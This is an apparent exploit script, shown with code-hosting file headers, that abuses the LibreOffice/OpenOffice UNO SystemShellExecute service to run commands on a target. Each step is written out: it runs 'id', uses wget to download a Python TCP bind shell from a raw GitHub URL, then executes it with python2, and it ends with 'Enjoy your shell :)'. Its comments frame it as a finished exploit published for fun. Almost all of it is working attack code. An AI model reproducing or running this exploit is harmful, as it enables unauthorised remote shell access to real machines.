25 lines
853 B
Python
Executable File
25 lines
853 B
Python
Executable File
#!/usr/bin/env python3
|
|
# -*- coding: utf-8 -*-
|
|
|
|
# some months ago, this bug had been shown, but not the full exploit published as there
|
|
# had been discussions with the vendor
|
|
# in any case i had fun exploiting it
|
|
# today i put it online, as sud0woodo who found the bug had published his full exploit as well some time ago check it here: https://www.exploit-db.com/exploits/46544
|
|
|
|
import uno
|
|
import time
|
|
|
|
bindshell='https://raw.githubusercontent.com/infodox/python-pty-shells/master/tcp_pty_bind.py'
|
|
localContext = uno.getComponentContext()
|
|
|
|
resolver = localContext.ServiceManager.createInstanceWithContext("com.sun.star.system.SystemShellExecute", localContext )
|
|
|
|
resolver.execute('id','','')
|
|
time.sleep(1)
|
|
resolver.execute('wget',bindshell,'')
|
|
time.sleep(2)
|
|
resolver.execute('python2','tcp_pty_bind.py','')
|
|
|
|
time.sleep(5)
|
|
print ('Enjoy your shell :)')
|